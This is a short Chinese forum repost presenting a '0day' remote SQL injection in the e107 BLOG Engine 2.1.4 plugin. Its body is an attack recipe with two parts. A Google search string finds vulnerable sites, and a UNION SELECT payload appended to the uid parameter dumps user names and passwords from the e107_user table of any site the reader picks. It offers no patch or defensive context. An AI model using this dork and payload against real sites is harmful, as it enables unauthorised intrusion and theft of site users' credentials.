黑基Web安全攻防班
黑基网 首页 IT技术 安全攻防 查看内容

网站0day分享--e107 Plugin BLOG Engine 2.1.4 Remote SQL Inj

2008-11-3 09:08| 投稿: security

摘要:   转载请注明:天阳网络技术联盟 http://bbs.tian6.com  其实这个洞是幻影发的。。。。。  这次给大家带来的是 e107 Plugin BLOG Engine 2.1.4 Remo...
  转载请注明:天阳网络技术联盟 http://bbs.tian6.com  其实这个洞是幻影发的。。。。。  这次给大家带来的是 e107 Plugin BLOG Engine 2.1.4 Remote SQL Inj PHP远程注入漏洞,非常的简单。  首先用GOOGLE搜索:  [Copy to clipboard] [ - ]CODE:  allinurl:"macgurublog.php?uid="  在里面随便选择一个站,打开后在UID=后输入:  [Copy to clipboard] [ - ]CODE:  -1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部